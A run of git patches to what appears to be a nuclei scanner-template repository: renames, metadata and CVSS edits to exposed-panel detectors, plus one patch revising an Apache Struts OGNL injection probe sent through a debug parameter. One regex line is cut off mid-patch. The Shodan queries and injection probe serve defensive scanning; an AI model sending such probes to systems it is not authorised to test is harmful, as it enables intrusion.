Prince Chaddha Date: Fri, 18 Nov 2022 19:19:30 +0530 Subject: [PATCH 0457/1415] Update unauth-selenium-grid-console.yaml --- misconfiguration/unauth-selenium-grid-console.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/unauth-selenium-grid-console.yaml b/misconfiguration/unauth-selenium-grid-console.yaml index e38172cfb9..e44fb5b21e 100644 --- a/misconfiguration/unauth-selenium-grid-console.yaml +++ b/misconfiguration/unauth-selenium-grid-console.yaml @@ -1,7 +1,7 @@ id: unauth-selenium-grid-console info: - name: Unauthenticated Selenium Grid Console + name: Unauthenticated Selenium Grid Console author: pussycat0x severity: info metadata: From b6f6d2dc3953dad5d8146b0840c34a3c45ea7024 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 18 Nov 2022 19:21:20 +0530 Subject: [PATCH 0458/1415] Update notion-detect.yaml --- technologies/notion-detect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/technologies/notion-detect.yaml b/technologies/notion-detect.yaml index 454ec124d4..7d8236874c 100644 --- a/technologies/notion-detect.yaml +++ b/technologies/notion-detect.yaml @@ -1,13 +1,13 @@ id: notion-detect info: - name: Notion detect + name: Notion Detect author: tess severity: info metadata: verified: true shodan-query: title:"Notion – One workspace. Every team." - tags: notion,detect + tags: notion,tech requests: - method: GET @@ -21,7 +21,7 @@ requests: words: - "Notion – One workspace. Every team." - "Notion Labs, Inc." - condition: and + condition: or - type: status status: From 93824c6c18907f0421a4ac4d1ade0088e49d68ae Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 18 Nov 2022 13:51:44 +0000 Subject: [PATCH 0459/1415] Auto Generated New Template Addition List [Fri Nov 18 13:51:44 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5f691446a3..ab2739cbb1 100644 --- a/.new-additions +++ b/.new-additions @@ -27,6 +27,7 @@ misconfiguration/phpmemcached-admin-panel.yaml misconfiguration/tasmota-config-webui.yaml misconfiguration/typo3-debug-mode.yaml misconfiguration/unauth-mercurial.yaml +misconfiguration/unauth-selenium-grid-console.yaml network/detection/dotnet-remoting-service-detect.yaml network/detection/esmtp-detect.yaml network/detection/imap-detect.yaml From 7a291069b37d945fcb7113d1d73fb86cff9d1676 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 18 Nov 2022 13:57:38 +0000 Subject: [PATCH 0460/1415] Auto Generated New Template Addition List [Fri Nov 18 13:57:38 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ab2739cbb1..96a1c1c679 100644 --- a/.new-additions +++ b/.new-additions @@ -33,6 +33,7 @@ network/detection/esmtp-detect.yaml network/detection/imap-detect.yaml network/detection/pop3-detect.yaml network/detection/telnet-detect.yaml +technologies/notion-detect.yaml technologies/secui-waf-detect.yaml technologies/sogo-detect.yaml technologies/tornado-server-login.yaml From dcc602cc192ae3dd5c89c22302b36cc4adb87e00 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 18 Nov 2022 19:33:59 +0530 Subject: [PATCH 0461/1415] Update and rename vulnerabilities/struts-dev-mode-ognl-injection.yaml to vulnerabilities/backdoor/struts2-ognl-backdoor.yaml --- .../struts2-ognl-backdoor.yaml} | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) rename vulnerabilities/{struts-dev-mode-ognl-injection.yaml => backdoor/struts2-ognl-backdoor.yaml} (67%) diff --git a/vulnerabilities/struts-dev-mode-ognl-injection.yaml b/vulnerabilities/backdoor/struts2-ognl-backdoor.yaml similarity index 67% rename from vulnerabilities/struts-dev-mode-ognl-injection.yaml rename to vulnerabilities/backdoor/struts2-ognl-backdoor.yaml index 3e69a94191..59d14f2980 100644 --- a/vulnerabilities/struts-dev-mode-ognl-injection.yaml +++ b/vulnerabilities/backdoor/struts2-ognl-backdoor.yaml @@ -1,4 +1,4 @@ -id: struts-dev-mode-ognl-injection +id: struts2-ognl-backdoor info: name: Apache Struts Dev Mode OGNL Injection @@ -10,18 +10,23 @@ info: metadata: verified: true shodan-query: html:"Struts Problem Report" - tags: apache,struts,ognl,misconfig + tags: apache,struts,ognl,misconfig,injection + +variables: + first: "{{rand_int(1000, 9999)}}" + second: "{{rand_int(1000, 9999)}}" + result: "{{to_number(first)*to_number(second)}}" requests: - method: GET path: - - '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{7*7}}' + - '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}' matchers-condition: and matchers: - type: word words: - - '[[49]]' + - '{{result}}' - type: status status: From eb40ffa199edf8ddefaa6a836df24ac92053cfbf Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 18 Nov 2022 19:38:27 +0530 Subject: [PATCH 0462/1415] Update sophos-fw-version-detect.yaml --- exposed-panels/sophos-fw-version-detect.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/exposed-panels/sophos-fw-version-detect.yaml b/exposed-panels/sophos-fw-version-detect.yaml index e8a1e83a06..ac5a3038b0 100644 --- a/exposed-panels/sophos-fw-version-detect.yaml +++ b/exposed-panels/sophos-fw-version-detect.yaml @@ -1,9 +1,12 @@ id: sophos-fw-version-detect info: - name: Sophos Firewall version detection + name: Sophos Firewall Version Detection author: organiccrap,daffainfo severity: info + metadata: + verified: true + shodan-query: title:"Sophos" tags: panel,sophos requests: @@ -29,5 +32,6 @@ requests: extractors: - type: regex part: body + group: 1 regex: - - "(?m) Date: Fri, 18 Nov 2022 14:29:20 +0000 Subject: [PATCH 0466/1415] Auto Generated New Template Addition List [Fri Nov 18 14:29:19 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 96a1c1c679..6446697a8c 100644 --- a/.new-additions +++ b/.new-additions @@ -19,6 +19,7 @@ exposed-panels/xibocms-login.yaml exposures/files/apache-licenserc.yaml file/keys/github-recovery-code.yaml iot/pqube-power-analyzers.yaml +misconfiguration/blackbox-exporter-metrics.yaml misconfiguration/docmosis-tornado-server.yaml misconfiguration/haproxy-exporter-metrics.yaml misconfiguration/installer/tasmota-install.yaml From 9118a216d11bc40b8bcaf76a23cc3d441fdd0f47 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 18 Nov 2022 20:03:15 +0530 Subject: [PATCH 0467/1415] Update and rename misconfiguration/unauth-selenium-grid.yaml to exposed-panels/selenium-grid.yaml --- .../selenium-grid.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) rename misconfiguration/unauth-selenium-grid.yaml => exposed-panels/selenium-grid.yaml (66%) diff --git a/misconfiguration/unauth-selenium-grid.yaml b/exposed-panels/selenium-grid.yaml similarity index 66% rename from misconfiguration/unauth-selenium-grid.yaml rename to exposed-panels/selenium-grid.yaml index 774c6f7169..91a71a4622 100644 --- a/misconfiguration/unauth-selenium-grid.yaml +++ b/exposed-panels/selenium-grid.yaml @@ -1,12 +1,12 @@ -id: unauth-selenium-grid +id: selenium-grid info: - name: Unauthenticated Selenium Grid + name: Selenium Grid Dashboard author: pussycat0x - severity: high + severity: unknown metadata: shodan-query: http.title:"Selenium Grid" - tags: misconfig,unauth + tags: panel,unauth,selenium requests: - method: GET @@ -18,8 +18,8 @@ requests: - type: word part: body words: - - "Selenium Grid" - condition: and + - "Selenium Grid" + - type: status status: - 200 From 176bd89d7a27871172a5bc5d9bbd689c71d6527f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 18 Nov 2022 14:51:03 +0000 Subject: [PATCH 0468/1415] Auto Generated New Template Addition List [Fri Nov 18 14:51:03 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6446697a8c..d7317f6122 100644 --- a/.new-additions +++ b/.new-additions @@ -13,6 +13,7 @@ cves/2022/CVE-2022-40881.yaml default-logins/tooljet/tooljet-default-login.yaml exposed-panels/apache-jmeter-dashboard.yaml exposed-panels/opencpu-panel.yaml +exposed-panels/selenium-grid.yaml exposed-panels/tekton-dashboard.yaml exposed-panels/wagtail-cms-detect.yaml exposed-panels/xibocms-login.yaml From 2975ca9193ed4059ca0b0b89b2c3470c5265dc44 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 18 Nov 2022 20:27:56 +0530 Subject: [PATCH 0469/1415] Update and rename bootstrap-admin-panel.yaml to bootstrap-admin-panel-template.yaml --- ...-admin-panel.yaml => bootstrap-admin-panel-template.yaml} | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) rename misconfiguration/{bootstrap-admin-panel.yaml => bootstrap-admin-panel-template.yaml} (86%) diff --git a/misconfiguration/bootstrap-admin-panel.yaml b/misconfiguration/bootstrap-admin-panel-template.yaml similarity index 86% rename from misconfiguration/bootstrap-admin-panel.yaml rename to misconfiguration/bootstrap-admin-panel-template.yaml index 9fd19c388c..0a68ee6bcc 100644 --- a/misconfiguration/bootstrap-admin-panel.yaml +++ b/misconfiguration/bootstrap-admin-panel-template.yaml @@ -1,7 +1,7 @@ -id: bootstrap-admin-panel +id: bootstrap-admin-panel-template info: - name: Bootstrap Admin Template + name: Bootstrap Admin Panel Template author: tess severity: info metadata: @@ -27,4 +27,3 @@ requests: part: body words: - "Bootstrap Admin Template" - condition: and From d1213eb8406d312143d1bf24db17f9e65c1e4890 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 18 Nov 2022 15:01:24 +0000 Subject: [PATCH 0470/1415] Auto Generated New Template Addition List [Fri Nov 18 15:01:24 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d7317f6122..bd0eb80956 100644 --- a/.new-additions +++ b/.new-additions @@ -21,6 +21,7 @@ exposures/files/apache-licenserc.yaml file/keys/github-recovery-code.yaml iot/pqube-power-analyzers.yaml misconfiguration/blackbox-exporter-metrics.yaml +misconfiguration/bootstrap-admin-panel-template.yaml misconfiguration/docmosis-tornado-server.yaml misconfiguration/haproxy-exporter-metrics.yaml misconfiguration/installer/tasmota-install.yaml From 24cd4a46573d014b0156d08cf9e9425a951a4ccf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 18 Nov 2022 20:32:02 +0530 Subject: [PATCH 0471/1415] Update and rename misconfiguration/np-data-cache.yaml to exposed-panels/np-data-cache.yaml --- {misconfiguration => exposed-panels}/np-data-cache.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename {misconfiguration => exposed-panels}/np-data-cache.yaml (85%) diff --git a/misconfiguration/np-data-cache.yaml b/exposed-panels/np-data-cache.yaml similarity index 85% rename from misconfiguration/np-data-cache.yaml rename to exposed-panels/np-data-cache.yaml index 1b3ac208f0..017c7d6f5f 100644 --- a/misconfiguration/np-data-cache.yaml +++ b/exposed-panels/np-data-cache.yaml @@ -1,13 +1,13 @@ id: np-data-cache info: - name: NP Data Cache Detect + name: NP Data Cache Panel author: tess - severity: info + severity: unknown metadata: verified: true shodan-query: title:"NP Data Cache" - tags: np,panel,detect + tags: np,panel,cache requests: - method: GET From d5effde35ba85b6c3bee4e0e54ce389e96d0878f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 18 Nov 2022 15:05:42 +0000 Subject: [PATCH 0472/1415] Auto Generated New Template Addition List [Fri Nov 18 15:05:42 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index bd0eb80956..7179c26b88 100644 --- a/.new-additions +++ b/.new-additions @@ -12,6 +12,7 @@ cves/2022/CVE-2022-3578.yaml cves/2022/CVE-2022-40881.yaml default-logins/tooljet/tooljet-default-login.yaml exposed-panels/apache-jmeter-dashboard.yaml +exposed-panels/np-data-cache.yaml exposed-panels/opencpu-panel.yaml exposed-panels/selenium-grid.yaml exposed-panels/tekton-dashboard.yaml From 48913449430d9de831adefdf8a7daaed075b9c79 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 18 Nov 2022 21:01:29 +0530 Subject: [PATCH 0473/1415] Update key-cloak-admin-panel.yaml --- exposed-panels/key-cloak-admin-panel.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/exposed-panels/key-cloak-admin-panel.yaml b/exposed-panels/key-cloak-admin-panel.yaml index 092f7f544a..aaae24bc89 100644 --- a/exposed-panels/key-cloak-admin-panel.yaml +++ b/exposed-panels/key-cloak-admin-panel.yaml @@ -2,7 +2,7 @@ id: key-cloak-admin-panel info: name: Keycloak Admin Panel - author: incogbyte,righettod,daffainfo + author: incogbyte,righettod severity: info metadata: verified: true @@ -12,18 +12,22 @@ info: requests: - method: GET path: + - "{{BaseURL}}" - "{{BaseURL}}/auth/admin" + - "{{BaseURL}}/auth/admin/master/console/" + stop-at-first-match: true host-redirects: true max-redirects: 2 - matchers-condition: and matchers: - type: word part: body words: - - '/keycloak/img/favicon.ico' - - 'kc-form-buttons' - condition: and + - "Keycloak" + - "alt=\"Keycloak" + - "kc-form-buttons" + - "/keycloak/img/favicon.ico" + condition: or - type: status status: From a0777ac852e4cf74a8ebfdd5780d3b746efd3536 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Fri, 18 Nov 2022 20:50:30 -0500 Subject: [PATCH 0474/1415] Dashboard Content Enhancements (#6105) Dashboard Content Enhancements --- exposed-panels/airflow-panel.yaml | 1 + exposed-panels/ambari-exposure.yaml | 1 + exposed-panels/avantfax-panel.yaml | 1 + exposed-panels/codemeter-webadmin-panel.yaml | 1 + exposed-panels/epson-access-detect.yaml | 1 + exposed-panels/ez-publish-panel.yaml | 2 +- exposed-panels/fiorilaunchpad-logon.yaml | 9 ++++++++- exposed-panels/fireware-xtm-user-authentication.yaml | 9 ++++++++- exposed-panels/flightpath-panel.yaml | 9 ++++++++- exposed-panels/flink-exposure.yaml | 9 ++++++++- exposed-panels/flip-cms-panel.yaml | 10 ++++++++-- exposed-panels/flowci-panel.yaml | 9 ++++++++- exposed-panels/flureedb-admin-console.yaml | 9 ++++++++- exposed-panels/footprints-panel.yaml | 9 ++++++++- exposed-panels/forti/fortiadc-panel.yaml | 9 ++++++++- exposed-panels/fortinet/fortiap-panel.yaml | 9 ++++++++- exposed-panels/fortinet/fortimail-panel.yaml | 9 ++++++++- .../fortinet/fortinet-fortigate-panel.yaml | 9 ++++++++- exposed-panels/fortinet/fortinet-panel.yaml | 9 ++++++++- exposed-panels/fortinet/fortios-panel.yaml | 11 ++++++++--- exposed-panels/fortinet/fortitester-login-panel.yaml | 9 ++++++++- exposed-panels/fortinet/fortiweb-panel.yaml | 9 ++++++++- exposed-panels/froxlor-management-panel.yaml | 9 ++++++++- exposed-panels/ftm-manager-panel.yaml | 10 ++++++++-- exposed-panels/fuelcms-panel.yaml | 9 ++++++++- exposed-panels/fuji-xerox-printer-detect.yaml | 9 ++++++++- exposed-panels/gargoyle-router.yaml | 9 ++++++++- exposed-panels/genweb-plus-panel.yaml | 9 ++++++++- exposed-panels/geoserver-login-panel.yaml | 9 ++++++++- exposed-panels/gerapy-detect.yaml | 9 ++++++++- exposed-panels/gespage-panel.yaml | 9 ++++++++- exposed-panels/gira-homeserver-homepage.yaml | 9 ++++++++- exposed-panels/git-repository-browser.yaml | 9 ++++++++- exposed-panels/gitblit-panel.yaml | 9 ++++++++- exposed-panels/gitea-login.yaml | 9 ++++++++- exposed-panels/github-enterprise-detect.yaml | 9 ++++++++- exposed-panels/gitlab-detect.yaml | 9 ++++++++- exposed-panels/globalprotect-panel.yaml | 9 ++++++++- exposed-panels/glpi-panel.yaml | 9 ++++++++- exposed-panels/go-anywhere-client.yaml | 9 ++++++++- exposed-panels/goanywhere-mft-login.yaml | 9 ++++++++- exposed-panels/gocd-login.yaml | 9 ++++++++- exposed-panels/gocron-panel.yaml | 9 ++++++++- exposed-panels/gogs-panel.yaml | 11 +++++++++-- exposed-panels/gophish-login.yaml | 9 ++++++++- exposed-panels/gradle/gradle-cache-node-detect.yaml | 9 ++++++++- exposed-panels/gradle/gradle-enterprise-panel.yaml | 9 ++++++++- exposed-panels/grafana-detect.yaml | 9 ++++++++- exposed-panels/grails-database-admin-console.yaml | 9 ++++++++- exposed-panels/graphite-browser.yaml | 9 ++++++++- exposed-panels/h2console-panel.yaml | 9 ++++++++- exposed-panels/hadoop-exposure.yaml | 9 ++++++++- exposed-panels/hangfire-dashboard.yaml | 9 ++++++++- exposed-panels/harbor-panel.yaml | 10 ++++++++-- exposed-panels/hashicorp-consul-webgui.yaml | 12 +++++++++--- exposed-panels/highmail-admin-panel.yaml | 9 ++++++++- exposed-panels/hitron-technologies.yaml | 12 ++++++++++-- exposed-panels/hivemanager-login-panel.yaml | 9 ++++++++- exposed-panels/hmc-hybris-panel.yaml | 9 ++++++++- exposed-panels/homematic-panel.yaml | 9 ++++++++- exposed-panels/honeywell-web-controller.yaml | 9 ++++++++- exposed-panels/honeywell-xl-web-controller.yaml | 9 +++++++-- exposed-panels/horde-login-panel.yaml | 9 ++++++++- exposed-panels/horde-webmail-login.yaml | 9 ++++++++- exposed-panels/hospital-management-panel.yaml | 9 ++++++++- exposed-panels/hp-ilo-5.yaml | 9 ++++++++- exposed-panels/hp-service-manager.yaml | 9 ++++++++- exposed-panels/hp-virtual-connect-manager.yaml | 9 ++++++++- exposed-panels/hpe-system-management-login.yaml | 9 ++++++++- exposed-panels/httpbin-panel.yaml | 9 ++++++++- exposed-panels/huawei-hg532e-panel.yaml | 10 ++++++++-- exposed-panels/hybris-administration-console.yaml | 9 ++++++++- exposed-panels/hydra-dashboard.yaml | 9 ++++++++- exposed-panels/hypertest-dashboard.yaml | 9 ++++++++- .../ibm/ibm-advanced-system-management.yaml | 9 ++++++++- exposed-panels/ibm/ibm-maximo-login.yaml | 9 ++++++++- exposed-panels/ibm/ibm-mqseries-web-console.yaml | 9 ++++++++- exposed-panels/ibm/ibm-note-login.yaml | 9 ++++++++- .../open-virtualization-manager-panel.yaml | 1 + exposed-panels/sicom-panel.yaml | 1 + exposed-panels/tenda-11n-wireless-router-login.yaml | 1 + technologies/elfinder-detect.yaml | 1 + 82 files changed, 589 insertions(+), 84 deletions(-) diff --git a/exposed-panels/airflow-panel.yaml b/exposed-panels/airflow-panel.yaml index b26647d5a5..446a0b9eb2 100644 --- a/exposed-panels/airflow-panel.yaml +++ b/exposed-panels/airflow-panel.yaml @@ -8,6 +8,7 @@ info: reference: - https://airflow.apache.org/docs/apache-airflow/stable/security/webserver.html classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-668 metadata: diff --git a/exposed-panels/ambari-exposure.yaml b/exposed-panels/ambari-exposure.yaml index 98dfcf442c..09272ca9d2 100644 --- a/exposed-panels/ambari-exposure.yaml +++ b/exposed-panels/ambari-exposure.yaml @@ -6,6 +6,7 @@ info: severity: info description: An Apache Ambari panel was discovered. classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-668 tags: panel,apache,ambari,exposure diff --git a/exposed-panels/avantfax-panel.yaml b/exposed-panels/avantfax-panel.yaml index 7a968e7b6a..9ea40fadfd 100644 --- a/exposed-panels/avantfax-panel.yaml +++ b/exposed-panels/avantfax-panel.yaml @@ -8,6 +8,7 @@ info: reference: - http://www.avantfax.com/ classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-668 metadata: diff --git a/exposed-panels/codemeter-webadmin-panel.yaml b/exposed-panels/codemeter-webadmin-panel.yaml index 3b8b0e48a5..5a433f873b 100644 --- a/exposed-panels/codemeter-webadmin-panel.yaml +++ b/exposed-panels/codemeter-webadmin-panel.yaml @@ -6,6 +6,7 @@ info: severity: info description: CodeMeter WebAdmin panel was accessed. classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-668 tags: codemeter,webadmin,panel diff --git a/exposed-panels/epson-access-detect.yaml b/exposed-panels/epson-access-detect.yaml index b7192cffca..5126086cb1 100644 --- a/exposed-panels/epson-access-detect.yaml +++ b/exposed-panels/epson-access-detect.yaml @@ -8,6 +8,7 @@ info: reference: - https://www.exploit-db.com/ghdb/6922 classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-668 tags: iot,printer,panel,unauth,epson,edb diff --git a/exposed-panels/ez-publish-panel.yaml b/exposed-panels/ez-publish-panel.yaml index 542977d66f..37321ba80c 100644 --- a/exposed-panels/ez-publish-panel.yaml +++ b/exposed-panels/ez-publish-panel.yaml @@ -4,7 +4,7 @@ info: name: eZ Publish Login Panel - Detect author: ritikchaddha severity: info - description: eZ Publsh login panel was detected. + description: eZ Publish login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 diff --git a/exposed-panels/fiorilaunchpad-logon.yaml b/exposed-panels/fiorilaunchpad-logon.yaml index 6d2687324c..6d1f2b12b2 100644 --- a/exposed-panels/fiorilaunchpad-logon.yaml +++ b/exposed-panels/fiorilaunchpad-logon.yaml @@ -1,11 +1,16 @@ id: fiorilaunchpad-logon info: - name: FioriLaunchpad Logon + name: Fiori Launchpad Login Panel - Detect author: dhiyaneshDK severity: info + description: Fiori Launchpad login panel was detected. reference: - https://www.exploit-db.com/ghdb/6793 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,edb requests: @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/fireware-xtm-user-authentication.yaml b/exposed-panels/fireware-xtm-user-authentication.yaml index 89c8b1d11b..2a0ae3c9ec 100644 --- a/exposed-panels/fireware-xtm-user-authentication.yaml +++ b/exposed-panels/fireware-xtm-user-authentication.yaml @@ -1,9 +1,14 @@ id: fireware-xtm-user-authentication info: - name: Fireware XTM User Authentication + name: Fireware XTM Login Panel - Detect author: dhiyaneshDK severity: info + description: Fireware XTM login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Fireware XTM User Authentication" tags: panel @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/flightpath-panel.yaml b/exposed-panels/flightpath-panel.yaml index 7ee18af999..e7fdd5f1ad 100644 --- a/exposed-panels/flightpath-panel.yaml +++ b/exposed-panels/flightpath-panel.yaml @@ -1,9 +1,14 @@ id: flightpath-panel info: - name: FlightPath Panel + name: FlightPath Login Panel - Detect author: princechaddha severity: info + description: FlightPath login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"flightpath" tags: panel,flightpath @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/flink-exposure.yaml b/exposed-panels/flink-exposure.yaml index 239e891e27..2ec106c25b 100644 --- a/exposed-panels/flink-exposure.yaml +++ b/exposed-panels/flink-exposure.yaml @@ -1,9 +1,14 @@ id: flink-exposure info: - name: Apache Flink Exposure + name: Apache Flink Login Panel - Detect author: pdteam severity: low + description: Apache Flink login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,apache,flink requests: @@ -15,3 +20,5 @@ requests: - type: word words: - 'Apache Flink Web Dashboard' + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/flip-cms-panel.yaml b/exposed-panels/flip-cms-panel.yaml index f4bc7a48c2..3883f480b5 100644 --- a/exposed-panels/flip-cms-panel.yaml +++ b/exposed-panels/flip-cms-panel.yaml @@ -1,13 +1,17 @@ id: flip-cms-panel info: - name: Flip CMS Login Panel + name: FlipCMS Login Panel - Detect author: idealphase severity: info description: | - We are a web agency in the province of Ancona (Falconara Marittima) and we deal with the creation of websites and digital projects. In our studio we create websites , we take care of the creation of e-commerce. + FlipCMS login panel was detected. reference: - https://www.fliplab.it/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true tags: panel,flip,cms @@ -36,3 +40,5 @@ requests: group: 1 regex: - 'Copyright © 2022 • v\.(.+) • ' + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/flowci-panel.yaml b/exposed-panels/flowci-panel.yaml index 35baec0f8f..c62744c179 100644 --- a/exposed-panels/flowci-panel.yaml +++ b/exposed-panels/flowci-panel.yaml @@ -1,12 +1,17 @@ id: flowci-panel info: - name: FlowCI Panel Detect + name: FlowCI Panel - Detect author: Adam Crosser severity: info + description: FlowCI panel was detected. reference: - https://github.com/FlowCI/flow-web-x - https://flowci.github.io/#/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,flowci requests: @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/flureedb-admin-console.yaml b/exposed-panels/flureedb-admin-console.yaml index 883ee6b88f..3e9231f1df 100644 --- a/exposed-panels/flureedb-admin-console.yaml +++ b/exposed-panels/flureedb-admin-console.yaml @@ -1,11 +1,16 @@ id: flureedb-admin-console info: - name: FlureeDB Admin Console + name: FlureeDB Admin Console Login Panel - Detect author: DhiyaneshDk severity: info + description: FlureeDB Admin Console login panel was detected. reference: - https://github.com/fluree/fluree-admin-ui + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"FlureeDB Admin Console" @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/footprints-panel.yaml b/exposed-panels/footprints-panel.yaml index 872d266be5..e884a9bd77 100644 --- a/exposed-panels/footprints-panel.yaml +++ b/exposed-panels/footprints-panel.yaml @@ -1,9 +1,14 @@ id: footprints-panel info: - name: footprints panel + name: FootPrints Service Core Login Panel - Detect author: tess severity: info + description: FootPrints Service Core login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"FootPrints Service Core Login" @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/forti/fortiadc-panel.yaml b/exposed-panels/forti/fortiadc-panel.yaml index a79f8db133..6c75b605d5 100644 --- a/exposed-panels/forti/fortiadc-panel.yaml +++ b/exposed-panels/forti/fortiadc-panel.yaml @@ -1,11 +1,16 @@ id: fortiadc-panel info: - name: FortiADC + name: FortiADC Login Panel - Detect author: DhiyaneshDk severity: info + description: FortiADC login panel was detected. reference: - https://www.fortinet.com/products/application-delivery-controller/fortiadc + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"FortiADC" @@ -30,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/fortinet/fortiap-panel.yaml b/exposed-panels/fortinet/fortiap-panel.yaml index 1da7253507..0a5b7256c7 100644 --- a/exposed-panels/fortinet/fortiap-panel.yaml +++ b/exposed-panels/fortinet/fortiap-panel.yaml @@ -1,11 +1,16 @@ id: fortiap-panel info: - name: FortiAP Panel + name: FortiAP Login Panel - Detect author: DhiyaneshDk severity: info + description: FortiAP login panel was detected. reference: - https://www.fortinet.com/products/wireless-access-points + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"FortiAP" @@ -30,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/fortinet/fortimail-panel.yaml b/exposed-panels/fortinet/fortimail-panel.yaml index cb0686d537..87b85ebbf7 100644 --- a/exposed-panels/fortinet/fortimail-panel.yaml +++ b/exposed-panels/fortinet/fortimail-panel.yaml @@ -1,9 +1,14 @@ id: fortimail-login info: - name: Fortinet FortiMail Login Panel + name: Fortinet FortiMail Login Panel - Detect author: johnk3r severity: info + description: Fortinet FortiMail login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: title:"Fortimail" 